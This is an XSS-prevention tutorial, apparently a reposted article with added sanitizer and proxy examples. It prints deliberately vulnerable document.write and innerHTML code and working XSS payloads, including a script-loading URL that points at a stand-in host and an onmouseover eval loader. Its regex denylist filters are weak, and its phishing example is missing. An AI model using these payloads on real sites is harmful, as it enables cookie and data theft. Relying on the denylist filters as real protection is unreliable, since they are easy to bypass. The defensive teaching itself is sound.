Preventing cross-site scripting attacks

Source: Internet
Author: User
Tags: html, comment

 

Escape parameters and user input

 

 

The following is a classic XSS attack that can leave your services or web applications open to attackers. By design, the website displays a user ID that is passed as a URL parameter. The script below takes the ID and displays a welcome message.

 

<script type="text/javascript">
var start = window.location.href.indexOf("id=");
var stop = window.location.href.length;
var id = "guest";
if (start !== -1 && start < stop) {
    // Skip past "id=" and take the rest of the URL as the value
    id = decodeURIComponent(window.location.href.substring(start + 3, stop));
}
// The decoded parameter is written into the page as raw HTML
document.write("Hi, " + id);
</script>

 

Requesting index.html?id=greg (index.html being the page that contains the script above) results in:

 

Hi, greg

 

What happens, though, if instead of "greg" I use the following URL:

 

index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E

 

Note that the URL above contains a reference to a script, http://baddomain.com/badscript.js, which loads malicious code from a different domain. That script is evaluated when the page loads, and all of the page's data is then at risk.

 

To prevent this type of attack, client code should always escape "<" and ">" in parameters before they are displayed or evaluated as JavaScript.

 

A simple line of code that does this is shown in the next example.

 

<script type="text/javascript">
var start = window.location.href.indexOf("id=");
var stop = window.location.href.length;
var id = "guest";
if (start !== -1 && start < stop) {
    id = decodeURIComponent(window.location.href.substring(start + 3, stop));
    // Replace angle brackets with their HTML entities so the value cannot open a tag
    id = id.replace(/</g, "&lt;").replace(/>/g, "&gt;");
}
document.write("Hi, " + id);
</script>

Consider the following page, which contains a form where a user enters a description that will be visible to other users.

<html>
<head>
<script type="text/javascript">
function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    // The raw value goes straight into the page as HTML: any tags it contains are parsed
    display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName(); return false;">
<textarea id="description" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>

Seems innocent enough? Try entering the following content in the text area.

 

 

 

<a onmouseover="eval('s=document.createElement(\'script\');document.body.appendChild(s);s.src=\'badscript.js\'')">Mouse Over Me</a>

 

Hovering over the link causes the script badscript.js to be loaded. That script could also send cookies or any other information it wants as URL parameters on "s.src". Unlike the first example, where the user has to click a bad link, this type of attack needs only a simple mouse-over to load badscript.js.

 

So now the question is: "How do you protect your web page from being misused?"

 

As with parameters, you should escape form input. If you plan to allow users to provide their own markup, consider the solution described later, which removes eval(), javascript: and script references from the user-supplied markup.

 

The following code shows how to escape the tags on the client.

 

<html>
<head>
<script type="text/javascript">
function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    // Escape angle brackets so the value can no longer open a tag
    description = description.replace(/</g, "&lt;").replace(/>/g, "&gt;");
    display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName(); return false;">
<textarea id="description" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>

The line description = description.replace(/</g, "&lt;").replace(/>/g, "&gt;"); filters the user input and prevents unwanted scripts from being executed.
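As an added example (not code from the original article), here is the escaping step from the two client-side examples above written as stand-alone functions that run under Node.js. It goes a little beyond the article's replace calls: escapeHtml also handles "&" and both quote characters, which matter as soon as the value lands inside an attribute, and the "id" parameter is read with the URL API instead of indexOf/substring, so only a real id= parameter is used and percent-decoding is done by the parser. The URLs and the description string are constructed samples; the encoded script tag is the article's own example payload.

```javascript
// Added example: HTML-escaping untrusted text before it is placed in a page.
const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape every character that has meaning in HTML text or attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Read the "id" query parameter with the URL API rather than indexOf/substring:
// the name must match exactly, the value stops at "&", and %xx is decoded for us.
function idFromHref(href) {
  const params = new URL(href).searchParams;
  return params.has("id") ? params.get("id") : "guest";
}

// Build the welcome message as HTML-safe text. The returned string can be passed
// to document.write or assigned to innerHTML without the parameter being parsed
// as markup; on a real page, element.textContent = id is simpler still.
function welcomeHtml(href) {
  return "Hi, " + escapeHtml(idFromHref(href));
}

// Same treatment for the description textarea: the string returned here is what
// should be assigned to display.innerHTML (or, better, display.textContent).
function descriptionHtml(description) {
  return escapeHtml(description);
}

// Constructed sample inputs (example.test is a hypothetical host).
const SAMPLE_HREFS = [
  "http://example.test/index.html?id=greg",
  "http://example.test/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E",
  "http://example.test/index.html",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const href of SAMPLE_HREFS) console.log(welcomeHtml(href));
  console.log(descriptionHtml('<a onmouseover="x">Mouse Over Me</a>'));
}
```

The second sample URL shows the point of escaping: the injected script tag is still visible in the output, but as text, not as an element the browser will execute.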

 

We have now seen how to prevent most attacks. The next section covers the case where you want to allow users to provide markup, as long as it contains no malicious code.

 

 

 

Removing eval(), javascript: and script references from user-provided markup

 

You may want to allow users to add markup, for example to display links or HTML content that other users will see. A blog might let users supply URLs, HTML tags, HTML comments or any other markup. Before that markup is displayed on a page, or before it is sent to a server or service, the solution is to filter all of the tags. The following example demonstrates how to prevent malicious code while allowing some HTML tags.

 

<html>
<head>
<script type="text/javascript">
function displayName() {
    var description = document.getElementById("description").value;
    var display = document.getElementById("display");
    // Remove quoted javascript: URLs (case-insensitive); the result must be assigned back
    description = description.replace(/[\"\'][\s]*javascript:(.*)[\"\']/gi, "\"\"");
    // Remove "script" and everything that follows it on the same line
    description = description.replace(/script(.*)/gi, "");
    // Remove eval(...) calls
    description = description.replace(/eval\((.*)\)/gi, "");

    display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName(); return false;">
<textarea id="description" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>

<div id="display"></div>
</body>
</html>

In the preceding example, all eval() calls, javascript: references and script references are removed from the field input. The replacement is not perfect, because it may also remove legitimate uses of the words "JavaScript" and "script" in the body of the text. You might consider modifying the regular expressions to look only at the attributes of a tag, for example removing a script reference only where it appears inside an attribute. There are other considerations, such as line breaks, character sets and case sensitivity, that you should keep in mind when hardening client code against attacks. Because some browsers allow CSS styles to invoke JavaScript, you should also consider screening any user-provided CSS styles as well.

 

 

 

Filter user input on the server

 

Most cross-site scripting problems are caused by poorly designed clients, but a server can also become an unwitting participant in a cross-site scripting attack if it re-displays unfiltered user input. Consider the following example, in which an attacker hand-crafts an HTTP POST request with the following as the home page URL.

 

<a href="javascript:eval('alert(\'bad\');')">click me</a>

 

The URL is stored on the server and served back as JavaScript that is exposed to any user who clicks the link. The example above looks innocent enough, but consider what would happen if, instead of alert('bad'), the href contained malicious code. To prevent such attacks, you should filter user input on the server. The following Java example demonstrates how to use regular-expression replacement to filter user input.

 

String description = request.getParameter("description");
if (description == null) {
    description = "";   // parameter absent: avoid a NullPointerException below
}
// Escape angle brackets so the value can no longer open a tag
description = description.replaceAll("<", "&lt;").replaceAll(">", "&gt;");
// Remove eval(...) calls
description = description.replaceAll("eval\\((.*)\\)", "");
// Remove quoted javascript: URLs (case-insensitive)
description = description.replaceAll("[\"\'][\\s]*((?i)javascript):(.*)[\"\']", "\"\"");
// Remove the word "script" (case-insensitive)
description = description.replaceAll("((?i)script)", "");

 

The removal of eval() calls, javascript: calls and script references in the code above is not perfect, because it may also remove legitimate uses of the words JavaScript and script in the body of the text. The code can be applied to all input parameters, or to each parameter as it is used, in a servlet, servlet filter or JSF component. Depending on how much markup you want to allow users to provide, you may need to refine the regular expressions to handle more cases, or consider creating a Java library specifically for scrubbing malicious code.
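Both the client-side filter above and the server-side Java filter take a denylist approach: they look for known-bad strings and delete them, which is why the text notes that they also hit legitimate uses of the word "script". The added example below (my code, not the article's) shows the allowlist alternative the text hints at when it suggests looking only at tag attributes: everything is escaped as text unless it is one of a small set of permitted tags, permitted attributes are copied through, and href values must parse as absolute http or https URLs. It runs under Node.js and the same logic applies on the server; the tag set, the example.test host and the sample markup are constructed for this example. A production system should use a maintained sanitizer library rather than this teaching version.

```javascript
// Added example: allowlist-based markup sanitizer (not the article's code).
// Tags not listed here are rendered as visible text; attributes not listed are dropped.
const ALLOWED_TAGS = {
  b: [], i: [], em: [], strong: [], p: [], br: [],
  a: ["href"],
};

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Matches one tag: optional "/", the tag name, and the raw attribute text.
const TAG_RE = /<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
// Matches one attribute: name, then optionally ="...", ='...' or =bare.
const ATTR_RE = /([a-zA-Z][\w-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Accept only absolute http(s) URLs, so javascript:, data: and the like are rejected
// by scheme rather than by pattern matching on the word "javascript".
function safeHref(value) {
  let u;
  try { u = new URL(value); } catch { return null; } // relative or malformed: reject
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.href;
}

function sanitizeMarkup(input) {
  let out = "";
  let last = 0;
  let m;
  TAG_RE.lastIndex = 0;
  while ((m = TAG_RE.exec(input)) !== null) {
    out += escapeHtml(input.slice(last, m.index)); // text between tags
    last = TAG_RE.lastIndex;
    const closing = m[1] === "/";
    const name = m[2].toLowerCase();
    if (!(name in ALLOWED_TAGS)) {
      out += escapeHtml(m[0]); // disallowed tag (script, iframe, ...) becomes text
      continue;
    }
    if (closing) {
      out += "</" + name + ">";
      continue;
    }
    let attrs = "";
    let a;
    ATTR_RE.lastIndex = 0;
    while ((a = ATTR_RE.exec(m[3])) !== null) {
      const attrName = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (!ALLOWED_TAGS[name].includes(attrName)) continue; // drops onmouseover, style, ...
      if (attrName === "href") {
        const href = safeHref(value);
        if (href === null) continue;
        attrs += ' href="' + escapeHtml(href) + '" rel="noopener noreferrer"';
      } else {
        attrs += " " + attrName + '="' + escapeHtml(value) + '"';
      }
    }
    out += "<" + name + attrs + ">";
  }
  out += escapeHtml(input.slice(last)); // trailing text
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  // Constructed samples: the article's hover payload shape, a script tag, and plain text
  console.log(sanitizeMarkup('<a onmouseover="eval(1)" href="http://example.test/">Mouse Over Me</a>'));
  console.log(sanitizeMarkup('<script src="x">alert(1)</script>'));
  console.log(sanitizeMarkup("1 < 2 & <b>bold</b>"));
}
```

Because the output is rebuilt from the allowlist rather than produced by deleting substrings, the word "script" in ordinary prose survives untouched, and an unknown tag fails safe as escaped text instead of depending on a pattern having anticipated it.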

 

A note on using JSONP and dynamic script injection

 

Dynamic script injection can be a powerful and useful way to retrieve JSON data (a technique known as JSONP), because it isolates your client from the source server. There is still debate about using JSONP. Some consider it a hack or a security vulnerability, because when you dynamically include a reference to a third-party script, that script has complete access to your web page. The script can go on to inject other scripts or do almost anything it wants.

 

If you choose to use JSONP, make sure that you only interact with websites you trust. There is no script that can stop a JSONP provider from including more than just the requested JSONP data. An alternative solution is to provide a proxy service, which lets you control the output, restrict access and cache as required.
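To make the proxy alternative concrete, here is an added example (my code, not the article's) of the core of such a service in Node.js. It restricts access by allowing only https URLs on an allowlisted host, controls the output by requiring the upstream body to parse as JSON and re-serializing it (a JSONP wrapper such as cb({...}) is rejected, so nothing executable ever reaches the browser), and caches responses for a fixed time. The fetch function is injected and synchronous so the example runs offline; the allowlisted host api.example.test and the canned upstream responses are constructed for this example.

```javascript
// Added example: a same-origin JSON proxy in place of JSONP (not the article's code).
const ALLOWED_UPSTREAM_HOSTS = new Set(["api.example.test"]); // hypothetical host
const CACHE_TTL_MS = 60 * 1000;
const responseCache = new Map(); // url -> { body, expires }

function jsonResponse(status, body, cached) {
  return { status, contentType: "application/json", body: JSON.stringify(body), cached };
}

// Restrict access: only https URLs on allowlisted hosts may be proxied.
function isAllowedUpstream(rawUrl) {
  let u;
  try { u = new URL(rawUrl); } catch { return false; }
  return u.protocol === "https:" && ALLOWED_UPSTREAM_HOSTS.has(u.hostname);
}

// Proxy one request. fetchText(url) is injected (and synchronous here) so the
// example runs offline; a real service would call an HTTP client instead.
function proxyJson(rawUrl, fetchText, now = Date.now()) {
  if (!isAllowedUpstream(rawUrl)) {
    return jsonResponse(403, { error: "upstream not allowed" }, false);
  }
  const hit = responseCache.get(rawUrl);
  if (hit && hit.expires > now) {
    return { status: 200, contentType: "application/json", body: hit.body, cached: true };
  }
  let data;
  try {
    // Control the output: the upstream body must parse as JSON data.
    // A JSONP wrapper like cb({...}), or any script, fails to parse and is refused.
    data = JSON.parse(fetchText(rawUrl));
  } catch {
    return jsonResponse(502, { error: "upstream unavailable or not JSON" }, false);
  }
  const body = JSON.stringify(data); // re-serialized: only parsed data is forwarded
  responseCache.set(rawUrl, { body, expires: now + CACHE_TTL_MS });
  return { status: 200, contentType: "application/json", body, cached: false };
}

// Constructed stand-in for the upstream service (no network access needed).
const FAKE_UPSTREAM = {
  "https://api.example.test/user/1": '{"id": 1, "name": "greg"}',
  "https://api.example.test/feed": 'handleFeed({"items": []});', // JSONP-style body
};
function fakeFetchText(url) {
  if (!(url in FAKE_UPSTREAM)) throw new Error("constructed upstream has no " + url);
  return FAKE_UPSTREAM[url];
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(proxyJson("https://api.example.test/user/1", fakeFetchText));
  console.log(proxyJson("https://api.example.test/user/1", fakeFetchText)); // served from cache
  console.log(proxyJson("https://api.example.test/feed", fakeFetchText));   // 502: JSONP, not JSON
  console.log(proxyJson("https://other.example.test/x", fakeFetchText));    // 403: not allowlisted
}
```

The browser then fetches from this endpoint with an ordinary same-origin request and parses the body as JSON; no third-party script is ever inserted into the page, which is the access the JSONP debate is about.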

 

 

 

Preventing XSS phishing attacks

 

It is also worth looking at how to protect yourself, as a user, from websites that are vulnerable to cross-site scripting attacks.

 

Phishing attacks, in which a link that appears to be a valid URL leads to a fraudulent web page set up to collect user data, are nothing new to the online world. A related attack involves a valid website that has a cross-site scripting vulnerability, reached through a URL that contains a script reference. Such a link may appear in an email, a blog post or comment, or any other user-generated content that contains a URL. Clicking a link to a site that has a cross-site scripting vulnerability may cause a third-party script to be included, which can collect your password, user ID or any other data it wants. See the following example:

A quick look at the URL shows that it references the website http://baidu.com/index.html. The script included in the URL parameter may well go unnoticed by an uninformed user.

 

It is wise to always take a closer look at a URL and at the parameters it carries. The URL is displayed in the status bar of your browser, and you should always look for external script references. Another option, if a link is suspect, is to type it manually into the browser's URL bar.

 

Keep up with known vulnerabilities and be very careful when providing any personal data to such websites.

 

Although JavaScript-based interfaces can be very flexible, you must be very careful about all user-provided input, whether it arrives as a parameter or as form data. Ensure that input is escaped or filtered on both the client and the server. As a user, be careful not to become a victim of a vulnerable website. Happy and safer coding!

 

By: 301

 

Zeracker@gmail.com
